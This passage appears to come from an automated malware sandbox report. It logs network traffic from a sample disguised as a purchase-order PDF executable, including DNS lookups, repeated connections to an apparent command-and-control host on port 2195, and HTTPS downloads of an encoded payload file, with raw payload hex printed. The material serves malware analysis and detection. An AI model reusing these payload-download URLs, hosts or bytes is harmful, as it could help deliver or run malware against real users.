                                                        Nov 21, 2024 12:58:59.715212107 CET219550176208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:58:59.715353012 CET501762195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:58:59.715768099 CET501762195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:58:59.835262060 CET219550176208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:00.160749912 CET44350175167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:00.160854101 CET44350175167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:00.167355061 CET50175443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:00.183572054 CET50175443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:00.185575962 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:00.185611010 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:00.185709000 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:00.186470985 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:00.186489105 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:01.673482895 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:01.676649094 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:01.676666975 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:01.819820881 CET219550176208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:01.819952011 CET501762195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:01.821362019 CET501762195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:01.829797029 CET501782195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:01.941009998 CET219550176208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:01.949460983 CET219550178208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:01.949727058 CET501782195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:01.950093985 CET501782195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:02.072045088 CET219550178208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:02.272861004 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:02.272922993 CET44350177167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:02.272984028 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:04.095060110 CET219550178208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:04.095330000 CET501782195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:04.666253090 CET50177443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:04.667407036 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:04.667435884 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:04.667772055 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:04.667772055 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:04.667800903 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:05.248744011 CET501782195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:05.368664980 CET219550178208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:06.250138998 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:06.252304077 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.252315044 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:06.863665104 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:06.863746881 CET44350179167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:06.863859892 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.865143061 CET50179443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.865143061 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.865183115 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:06.865494013 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.865494013 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:06.865523100 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:08.406039953 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:08.407840014 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:08.407856941 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:08.749799013 CET501812195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:08.869571924 CET219550181208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:08.869745970 CET501812195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:08.870074987 CET501812195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:08.992425919 CET219550181208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:09.009620905 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:09.009673119 CET44350180167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:09.009839058 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:09.010902882 CET50180443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:09.010902882 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:09.010935068 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:09.011488914 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:09.013402939 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:09.013412952 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:10.549571037 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:10.551559925 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:10.551575899 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:11.029577017 CET219550181208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:11.029815912 CET501812195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:11.030359030 CET501812195192.168.2.6208.70.254.118
                                                        Nov 21, 2024 12:59:11.150187016 CET219550181208.70.254.118192.168.2.6
                                                        Nov 21, 2024 12:59:11.154767036 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:11.154845953 CET44350182167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:11.155343056 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:11.155687094 CET50182443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:11.156349897 CET50183443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:11.156444073 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:11.156579018 CET50183443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:11.156883001 CET50183443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:11.156918049 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:12.692301035 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:12.694458961 CET50183443192.168.2.6167.250.5.91
                                                        Nov 21, 2024 12:59:12.694499969 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:13.296781063 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:13.296945095 CET44350183167.250.5.91192.168.2.6
                                                        Nov 21, 2024 12:59:13.297347069 CET50183443192.168.2.6167.250.5.91

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 21, 2024 12:54:55.321299076 CET5419053192.168.2.61.1.1.1
                                                        Nov 21, 2024 12:54:55.721441031 CET53541901.1.1.1192.168.2.6
                                                        Nov 21, 2024 12:55:05.968697071 CET5923453192.168.2.61.1.1.1
                                                        Nov 21, 2024 12:55:06.203737020 CET53592341.1.1.1192.168.2.6

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 21, 2024 12:54:55.321299076 CET192.168.2.61.1.1.10x40a7Standard query (0)sierrassinfinusadas.com.arA (IP address)IN (0x0001)false
                                                        Nov 21, 2024 12:55:05.968697071 CET192.168.2.61.1.1.10x3c04Standard query (0)teewire.ydns.euA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 21, 2024 12:54:55.721441031 CET1.1.1.1192.168.2.60x40a7No error (0)sierrassinfinusadas.com.ar167.250.5.91A (IP address)IN (0x0001)false
                                                        Nov 21, 2024 12:55:06.203737020 CET1.1.1.1192.168.2.60x3c04No error (0)teewire.ydns.eu208.70.254.118A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • sierrassinfinusadas.com.ar

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.649707167.250.5.914436500C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:54:57 UTC93OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        Connection: Keep-Alive
                                                        2024-11-21 11:54:58 UTC183INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:54:57 GMT
                                                        Content-Length: 2133504
                                                        Connection: close
                                                        Last-Modified: Thu, 21 Nov 2024 10:13:17 GMT
                                                        Accept-Ranges: bytes
                                                        2024-11-21 11:54:58 UTC16201INData Raw: 7a 6a a4 37 33 34 37 30 30 37 30 34 c8 cf 34 37 88 34 37 30 34 37 30 34 77 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 37 30 34 b7 30 34 37 3e 2b 8d 3e 34 83 39 f9 16 88 35 7b fd 15 63 58 5d 44 10 44 45 5f 53 45 51 59 17 53 55 59 5e 5b 43 10 56 52 10 46 42 5e 14 5e 5e 14 73 7f 67 17 5d 5b 53 55 1a 3a 3d 3e 13 30 34 37 30 34 37 30 64 72 30 34 7b 31 37 37 01 f2 fe a8 34 37 30 34 37 30 34 37 d0 34 39 11 3f 36 00 34 37 b6 14 37 30 32 37 30 34 37 30 34 69 94 14 37 30 14 37 30 34 f7 10 34 37 30 74 37 30 14 37 30 34 35 30 34 33 30 34 37 30 34 37 30 30 37 30 34 37 30 34 37 30 34 16 30 34 35 30 34 37 30 34 37 33 34 77 b5 34 37 20 34 37 20 34 37 30 34 27 30 34 27 30 34 37 30 34 37 3f 34 37 30 34 37 30 34 37 30 34
                                                        Data Ascii: zj734700704474704704w04704704704704704704704704704704704047>+>495{cX]DDE_SEQYSUY^[CVRFB^^^sg][SU:=>0470470dr04{1774704704749?647702704704i70704470t7070450430470470070470470404504704734w47 47 4704'04'047047?4704704704
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 08 f9 ca cf cb 44 26 34 37 3a b4 1b 31 34 33 10 3d 37 30 34 0f 89 c9 c8 cf 4a 19 31 34 33 10 42 90 b0 d6 17 44 67 e2 bb 55 49 72 36 37 34 4f 7c 32 34 33 51 1c ff 32 34 31 10 f4 f0 d2 e2 17 19 56 dc e1 55 49 72 36 37 34 4f 3c 32 34 33 51 1c ff 32 34 31 5f 04 37 30 3e 17 3d 34 37 30 4a 75 32 34 33 4b 2a 35 30 30 0d 55 c9 c8 cf 12 17 22 34 37 30 0c 6d cd cb c8 4e 1a 36 30 30 17 5c 7a 46 37 14 5c 57 61 16 68 14 1d b6 46 09 51 4a 75 32 34 33 4b 27 35 30 30 56 18 a1 35 30 32 17 a7 9f ac 73 14 69 7e 22 60 51 14 96 96 af 3a 51 4a 75 32 34 33 4b 75 35 30 30 56 18 fc 35 30 32 58 00 34 37 3a 14 37 30 34 37 4e 76 35 30 30 4c 48 36 37 34 0e cd cc cb c8 16 14 37 30 34 37 08 db cb cf cb 1f 93 36 37 36 14 37 30 34 37 4e 76 35 30 30 4c 2a 36 37 34 0e e1 cc cb c8 16 14 3c
                                                        Data Ascii: D&47:143=704J143BDgUIr674O|243Q241VUIr674O<243Q241_70>=470Ju243K*500U"470mN600\zF7\WahFQJu243K'500V502si~"`Q:QJu243Ku500V502X47:7047Nv500LH67470476767047Nv500L*674<
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 34 37 41 02 37 30 b8 36 30 34 71 7a 34 37 45 18 37 30 4e 39 30 34 4d 19 34 37 ed 7f 37 30 f7 2e 30 34 1f 2c 34 37 9b 02 37 30 42 74 30 34 c4 2a 34 37 47 0a 37 30 21 63 30 34 71 74 34 37 ab 1f 37 30 7b 7a 30 34 77 3b 34 37 57 36 37 30 68 03 30 34 99 7a 34 37 bf 0a 37 30 05 2c 30 34 9a 30 34 37 34 77 37 30 18 24 30 34 cc 31 34 37 73 0d 37 30 61 75 30 34 d2 05 34 37 b6 73 37 30 d3 37 30 34 60 02 34 37 82 1e 37 30 d0 33 30 34 2f 2b 34 37 d2 2f 37 30 09 03 30 34 b7 0c 34 37 4d 68 37 30 a1 17 30 34 08 7e 34 37 4f 28 37 30 05 36 30 34 19 18 34 37 63 27 37 30 48 6d 30 34 96 6a 34 37 b0 0f 37 30 f7 35 30 34 59 2b 34 37 2b 18 37 30 c8 1c 30 34 c0 2f 34 37 e4 0c 37 30 40 63 30 34 e9 38 34 37 a4 14 37 30 5d 6d 30 34 e3 02 34 37 0c 17 37 30 27 75 30 34 b3 07 34 37 d6
                                                        Data Ascii: 47A70604qz47E70N904M4770.04,4770Bt04*47G70!c04qt4770{z04w;47W670h04z4770,040474w70$04147s70au0447s70704`4770304/+47/700447Mh7004~47O(7060447c'70Hm04j4770504Y+47+7004/4770@c0484770]m044770'u0447
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 37 08 af 88 cf cb 17 9c 34 37 30 14 0e 30 34 37 69 ca 39 02 34 17 a0 35 37 30 0c b1 8f cb c8 21 52 b9 59 b9 2b 30 34 36 23 5d 17 37 35 37 30 0c 46 8f cb c8 21 44 20 68 27 47 10 1c 36 30 34 0f 51 8b c8 cf e4 b6 30 34 35 18 52 34 30 32 58 52 34 37 3a 1c 65 33 34 31 26 ae 1f 63 37 37 36 27 5a 10 a3 35 30 34 0f 0a 8b c8 cf ca 3b 7c 34 17 3a 34 37 30 14 b0 30 34 37 10 19 37 30 34 6e ac 14 ef 30 34 37 ce 3a 6d 30 0c 24 8f cb c8 ce 38 38 30 14 34 30 34 37 10 4d 37 30 34 17 72 34 37 30 6c ab 10 16 35 30 34 0f c8 8a c8 cf 26 1e 18 87 37 30 3e 1f 4a 37 37 36 27 75 10 5a 36 30 34 0f d0 8a c8 cf 14 fb 30 34 37 10 70 37 30 34 6e ce 3a 03 30 14 bc 31 34 37 08 f3 89 cf cb 17 4d 34 37 30 14 1e 30 34 37 69 ca 39 04 34 17 bc 36 37 30 0c 99 8e cb c8 26 27 50 10 65 36 30 34
                                                        Data Ascii: 7470047i94570!RY+046#]7570F!D h'G604Q045R402XR47:e341&c776'Z504;|4:470047704n047:m0$8804047M704r470l504&70>J776'uZ604047p704n:0147M470047i94670&'Pe604
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 30 ff 2e 30 34 32 3c 34 37 de 14 37 30 ca 1d 30 34 6b 1a 34 37 a1 27 37 30 56 37 30 34 cc 20 34 37 ac 3b 37 30 eb 1c 30 34 4e 1e 34 37 db 15 37 30 12 2f 30 34 c3 2a 34 37 f3 31 37 30 e7 39 30 34 c7 00 34 37 a8 20 37 30 99 18 30 34 01 25 34 37 29 35 37 30 be 07 30 34 54 22 34 37 9a 3e 37 30 78 26 30 34 6b 12 34 37 67 28 37 30 d9 38 30 34 3c 14 34 37 15 3f 37 30 ff 3c 30 34 8d 23 34 37 82 04 37 30 f1 22 30 34 a0 37 34 37 64 23 37 30 f1 18 30 34 e6 00 34 37 c0 2a 37 30 96 2d 30 34 0a 2f 34 37 fe 1a 37 30 90 33 30 34 36 10 34 37 cb 11 37 30 dd 28 30 34 59 25 34 37 25 1d 37 30 5b 2c 30 34 21 1b 34 37 f4 22 37 30 19 2c 30 34 10 39 34 37 3c 27 37 30 7b 3c 30 34 eb 1e 34 37 cb 14 37 30 bf 3c 30 34 0b 36 34 37 f3 30 37 30 99 3f 30 34 d3 16 34 37 06 38 37 30 31 37
                                                        Data Ascii: 0.042<477004k47'70V704 47;7004N4770/04*4717090447 7004%47)57004T"47>70x&04k47g(70804<47?70<04#4770"04747d#700447*70-04/477030464770(04Y%47%70[,04!47"70,04947<'70{<044770<04647070?044787017
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 34 37 30 34 37 27 1e 25 30 34 20 1a 34 37 30 27 07 33 34 33 30 34 37 30 34 37 30 34 37 24 1e 24 00 30 37 34 34 37 30 34 37 30 34 37 30 20 1d 23 04 33 30 30 37 30 34 37 30 34 37 30 34 23 1a 26 37 30 20 1d 30 34 37 22 34 37 27 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30 26 37 30 20 1d 30 34 37 22 34 37 24 1e 37 30 34 25 30 34 23 1a 34 37 30
                                                        Data Ascii: 47047'%04 470'343047047047$$074470470470 #300704704704#&70 047"47'704%04#470&70 047"47$704%04#470&70 047"47$704%04#470&70 047"47$704%04#470&70 047"47$704%04#470&70 047"47$704%04#470&70 047"47$704%04#470&70 047"47$704%04#470
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 34 3e 34 39 31 3a 35 5f 1c 3e 30 32 1d 30 34 75 18 fa 35 30 32 e7 04 35 37 32 1c f2 32 34 31 1a 34 37 30 0a 1c 35 1c 1b ab 73 7c 3e 34 58 1c 3d 37 36 1e 75 18 fa 35 30 32 e7 05 35 37 32 1c f2 32 34 31 1a 34 37 30 0a 1c 35 1c 8e 0f 2b 63 3e 34 58 00 3d 37 36 1e 75 18 fa 35 30 32 e7 06 35 37 32 1c f2 32 34 31 1a 34 37 30 0a 1c 35 1c 45 de 07 6c 3e 34 58 04 3d 37 36 1e 75 18 fa 35 30 32 e7 07 35 37 32 1c f2 32 34 31 1a 34 37 30 72 1c 35 1c 1e 15 11 5e 3e 35 39 30 5b 0f 39 34 31 1a 34 37 72 1c f9 32 34 31 e0 0c 36 30 36 1f f5 36 37 36 1e 37 30 34 79 1b 31 1f 79 50 3f 02 3a 35 3e 34 39 31 5b 0b 39 34 31 1a 76 1f fe 36 37 36 e4 0e 31 34 35 18 f1 35 30 32 1d 30 34 37 76 1f 32 18 73 d3 25 66 39 31 3a 37 5f 74 3e 30 32 1d 30 34 75 18 fa 35 30 32 e7 0a 35 37 32 1c
                                                        Data Ascii: 4>491:5_>0204u5025722414705s|>4X=76u5025722414705+c>4X=76u5025722414705El>4X=76u502572241470r5^>590[94147r241606676704y1yP?:5>491[941v676145502047v2s%f91:7_t>0204u502572
                                                        2024-11-21 11:54:58 UTC16384INData Raw: a0 3b 37 36 1e 37 30 76 1f fe 36 37 36 e4 f9 32 34 35 18 f1 35 30 32 1d 30 34 37 76 1f 32 18 bb 82 72 73 39 31 3a 37 5f a0 38 30 32 1d 30 34 75 18 fa 35 30 32 e7 ff 36 37 32 1c f2 32 34 31 1a 34 37 30 72 1c 35 1c 47 f8 55 52 3e 35 39 30 5b af 3f 34 31 1a 34 37 72 1c f9 32 34 31 e0 e4 35 30 36 1f f5 36 37 36 1e 37 30 34 71 1b 31 1f 18 64 7a 00 3a 36 3e 34 58 ac 3b 37 36 1e 37 30 76 1f fe 36 37 36 e4 e6 32 34 35 18 f1 35 30 32 1d 30 34 37 7e 1f 32 18 06 54 59 72 39 32 3a 37 3e 35 58 90 3b 37 36 1e 75 18 fa 35 30 32 e7 e2 36 37 32 1c f2 32 34 31 1a 34 37 30 62 1c 35 1c 21 3f 0b 72 3e 37 39 30 3a 36 3e 36 58 94 3b 37 36 1e 37 30 76 1f fe 36 37 36 e4 e4 32 34 35 18 f1 35 30 32 1d 30 34 37 76 1f 32 18 b5 d6 59 68 39 31 3a 37 5f 9c 38 30 32 1d 30 34 75 18 fa 35
                                                        Data Ascii: ;7670v676245502047v2rs91:7_80204u502672241470r5GUR>590[?4147r241506676704q1dz:6>4X;7670v676245502047~2TYr92:7>5X;76u502672241470b5!?r>790:6>6X;7670v676245502047v2Yh91:7_80204u5
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 34 19 fe bb 1c 23 34 0e fe a8 1c 23 34 73 fe 82 1c 23 34 78 fe f7 1c 23 34 6d fe ed 1c 23 34 52 fe d9 1c 23 34 47 fe 37 1b 23 34 4c fe 23 1b 23 34 b1 fe 05 1b 23 34 a6 fe 09 1b 23 34 ab fe 7d 1b 23 34 90 fe 62 1b 23 34 85 fe 58 1b 23 34 8a fe 4f 1b 23 34 ff fe bc 1b 23 34 e4 fe a1 1b 23 34 e9 fe 96 1b 23 34 de fe 8a 1b 23 34 c3 fe e4 1b 23 34 c8 fe e9 1b 23 34 3d ff c5 1b 23 34 1d ff 33 1a 23 34 02 ff 21 1a 23 34 77 ff 1f 1a 23 34 7c ff 0e 1a 23 34 61 ff 7a 1a 23 34 56 ff 5c 1a 23 34 5b ff 4a 1a 23 34 40 ff a2 1a 23 34 b5 ff 96 1a 23 34 ba ff 9b 1a 23 34 af ff 88 1a 23 34 94 ff fa 1a 23 34 99 ff d4 1a 23 34 8e ff c2 1a 23 34 f3 ff 24 19 23 34 f8 ff 28 19 23 34 ed ff 1a 19 23 34 d2 ff 74 19 23 34 c7 ff 66 19 23 34 cc ff 52 19 23 34 31 e0 4c 19 23 34 26 e0
                                                        Data Ascii: 4#4#4s#4x#4m#4R#4G7#4L##4#4#4}#4b#4X#4O#4#4#4#4#4#4#4=#43#4!#4w#4|#4az#4V\#4[J#4@#4#4#4#4#4#4#4$#4(#4#4t#4f#4R#41L#4&
                                                        2024-11-21 11:54:58 UTC16384INData Raw: 37 38 34 a4 30 55 a4 0a 20 c5 33 90 64 31 34 3f 30 a7 37 45 a7 3f 21 c6 34 88 67 36 30 3c 37 a3 34 be a3 78 23 c2 37 e7 63 35 37 38 34 a4 30 a9 a4 62 20 c5 33 d0 64 31 34 3f 30 a7 37 81 a7 fc 28 c6 34 cc 67 36 30 3c 37 a3 34 f2 a3 3c 26 c3 37 27 64 35 37 38 34 a4 30 ed a4 76 20 c4 33 1c 63 31 34 3f 30 a7 37 dd a7 8e 31 c7 34 0c 60 36 30 3c 37 a3 34 36 a4 3c 26 c3 37 67 64 35 37 38 34 a4 30 21 a3 89 35 c4 33 50 63 31 34 3f 30 a7 37 19 a0 4a 2b c7 34 4c 60 36 30 3c 37 a3 34 0a a4 3c 26 c4 37 a7 64 35 37 38 34 a4 30 65 a3 ba 35 c3 33 94 63 31 34 3f 30 a7 37 55 a0 c2 3f c0 34 9c 60 36 30 3c 37 a1 34 4e a4 b7 2c c4 37 8b 64 35 37 38 34 a6 30 a7 a3 a0 2f c1 33 f8 63 31 34 3f 30 a5 37 ae a0 a9 2b cd 34 ec 60 36 30 3c 37 a1 34 9e a4 9e 2c cc 37 db 64 35 37 38 34
                                                        Data Ascii: 7840U 3d14?07E?!4g60<74x#7c57840b 3d14?07(4g60<74<&7'd57840v 3c14?0714`60<746<&7gd57840!53Pc14?07J+4L`60<74<&7d57840e53c14?07U?4`60<74N,7d57840/3c14?07+4`60<74,7d5784


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649737167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:16 UTC93OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        Connection: Keep-Alive
                                                        2024-11-21 11:55:16 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:16 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:16 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.649742167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:18 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:19 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:18 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:19 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.649751167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:20 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:21 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:21 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
